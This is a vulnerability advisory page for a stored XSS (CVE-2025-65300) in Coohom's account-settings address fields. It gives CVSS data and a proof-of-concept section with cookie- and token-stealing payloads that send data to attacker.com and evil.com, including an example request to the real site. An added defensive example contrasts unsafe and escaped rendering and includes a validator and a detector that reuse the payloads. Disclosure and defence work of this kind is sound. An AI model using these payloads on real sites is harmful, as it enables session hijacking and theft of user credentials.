Security Vulnerability Report
CVE-2025-65300 CVSS 5.4 MEDIUM

Published: 2025-12-09 19:15:49
Last Modified: 2025-12-16 19:57:19

Description

A stored Cross-Site Scripting (XSS) vulnerability exists in the Coohom SaaS Platform feVersion=1760060603897 (2025-10-28) in the Account Settings module, where unsanitized user input in Address fields (City, State, Country/Region) is rendered back to the page. Attackers can inject arbitrary JavaScript code, which executes when the affected profile page is viewed. This can lead to session hijacking, cookie theft, or arbitrary script execution in the victim's browser.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:coohom:coohom:2025-10-28:*:*:*:*:*:*:* - VULNERABLE
Coohom SaaS Platform feVersion=1760060603897 (2025-10-28)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-65300 PoC - Stored XSS in Coohom SaaS Platform
// Target: Account Settings -> Address Fields (City, State, Country/Region)

// Step 1: Log in to the Coohom SaaS Platform with a low-privilege account,
//         then navigate to the Account Settings page.

// Step 2: Inject an XSS payload in the City field
const xssPayloadCity = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>';
// Or use a shorter payload (inner quotes escaped so the string literal is valid JavaScript)
const xssPayloadAlt = '<img src=x onerror="fetch(\'https://attacker.com/steal?data=\'+btoa(document.cookie))">';

// Step 3: Similar payloads for the State and Country/Region fields
// City:           <script>alert(document.domain)</script>
// State:          <img src=x onerror=document.location='https://evil.com/?c='+document.cookie>
// Country/Region: <svg/onload=fetch('https://attacker.com/'+localStorage.getItem('token'))>

// Step 4: Save the settings - the payload is stored on the server
// Step 5: When any user views the profile, the XSS executes

// Example HTTP request:
/*
POST /api/user/profile HTTP/1.1
Host: www.coohom.com
Content-Type: application/json

{
  "address": {
    "city": "<script>document.location='https://attacker.com/steal?cookie='+document.cookie</script>",
    "state": "TestState",
    "country": "China"
  }
}
*/
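Added example, not Coohom's code and not part of the original advisory: the rendering defect the Description and the PoC above describe, shown as a vulnerable template beside a hardened one, with a server-side allowlist for address fields and a small regression check that flags the PoC payloads. The field names city, state and country follow the PoC's example request; the template markup, function names and regexes are assumptions made for illustration. Runs under Node.js with no DOM.

```javascript
// Added example, not Coohom's code: stored XSS in address fields, vulnerable vs hardened rendering.
// Field names follow the PoC's example request; template markup and helpers are assumptions.

// Constructed input: the three payloads from the PoC above, as an attacker would store them.
const STORED_PAYLOADS = {
  city: '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>',
  state: "<img src=x onerror=document.location='https://evil.com/?c='+document.cookie>",
  country: "<svg/onload=fetch('https://attacker.com/'+localStorage.getItem('token'))>",
};

// Vulnerable pattern (what the advisory describes): stored values are interpolated
// straight into the profile page's HTML, so any markup they contain becomes live.
function renderAddressUnsafe(address) {
  return '<div class="address">' +
    '<span class="city">' + address.city + '</span>, ' +
    '<span class="state">' + address.state + '</span>, ' +
    '<span class="country">' + address.country + '</span>' +
    '</div>';
}

// Fix 1 (the actual fix): contextual output encoding for the HTML text context.
// Every character that can open a tag, attribute or entity is replaced by an entity.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(value).replace(/[&<>"'/]/g, (ch) => map[ch]);
}

function renderAddressSafe(address) {
  return '<div class="address">' +
    '<span class="city">' + escapeHtml(address.city) + '</span>, ' +
    '<span class="state">' + escapeHtml(address.state) + '</span>, ' +
    '<span class="country">' + escapeHtml(address.country) + '</span>' +
    '</div>';
}

// Fix 2 (defence in depth, not a replacement for encoding): validate the fields on the
// server when the profile is saved. Place names need letters, combining marks, spaces,
// dots, apostrophes and hyphens; they never need angle brackets or parentheses.
const ADDRESS_FIELD = /^[\p{L}\p{M}\s.'-]{1,100}$/u;
function validateAddress(address) {
  const rejected = [];
  for (const field of ['city', 'state', 'country']) {
    const value = address[field];
    if (typeof value !== 'string' || !ADDRESS_FIELD.test(value)) rejected.push(field);
  }
  return rejected; // empty array means every field passed
}

// Regression check for the rendered page: every tag in the output must be one the
// template itself emits, and none may carry an event-handler attribute. Because the
// safe renderer encodes '<', user data can never produce a tag of its own.
const TEMPLATE_TAGS = new Set(['div', 'span']);
const TAG_RE = /<\/?\s*([a-z][a-z0-9]*)([^>]*)>/gi;
function findUnexpectedMarkup(html) {
  const findings = [];
  for (const match of html.matchAll(TAG_RE)) {
    const [tag, name, attrs] = match;
    if (!TEMPLATE_TAGS.has(name.toLowerCase()) || /\bon[a-z]+\s*=/i.test(attrs)) {
      findings.push(tag);
    }
  }
  return findings;
}

// Stand-alone run: the unsafe renderer leaks four executable tags, the safe one none,
// and the validator rejects all three stored payloads before they are ever persisted.
console.log('unsafe:', findUnexpectedMarkup(renderAddressUnsafe(STORED_PAYLOADS)));
console.log('safe:', findUnexpectedMarkup(renderAddressSafe(STORED_PAYLOADS)));
console.log('validation rejects:', validateAddress(STORED_PAYLOADS));
```

The encoding step is the fix; the allowlist only narrows what reaches storage and would not help a field that legitimately needs richer characters. In a real front end the same effect comes from assigning user data with textContent or a framework's default-escaping binding rather than innerHTML or string-built templates; a Content-Security-Policy without unsafe-inline would additionally stop the inline handlers in these payloads from running, though it does not remove the underlying bug.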

References

https://gist.github.com/garux-sec/ec9a6b6e7e4b617b7245ec18252a6377 (Third Party Advisory)
https://www.coohom.com/pub/saas/settings/account (Permissions Required)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-65300",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-09T19:15:49.410",
    "lastModified": "2025-12-16T19:57:18.740",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A stored Cross-Site Scripting (XSS) vulnerability exists in the Coohom SaaS Platform feVersion=1760060603897 (2025-10-28) in the Account Settings module, where unsanitized user input in Address fields (City, State, Country/Region) is rendered back to the page. Attackers can inject arbitrary JavaScript code, which executes when the affected profile page is viewed. This can lead to session hijacking, cookie theft, or arbitrary script execution in the victim's browser."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-79"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:coohom:coohom:2025-10-28:*:*:*:*:*:*:*",
                "matchCriteriaId": "8FD9CC2A-BFEF-44C0-8943-6A8B6C11701F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gist.github.com/garux-sec/ec9a6b6e7e4b617b7245ec18252a6377",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://www.coohom.com/pub/saas/settings/account",
        "source": "[email protected]",
        "tags": ["Permissions Required"]
      },
      {
        "url": "https://gist.github.com/garux-sec/ec9a6b6e7e4b617b7245ec18252a6377",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}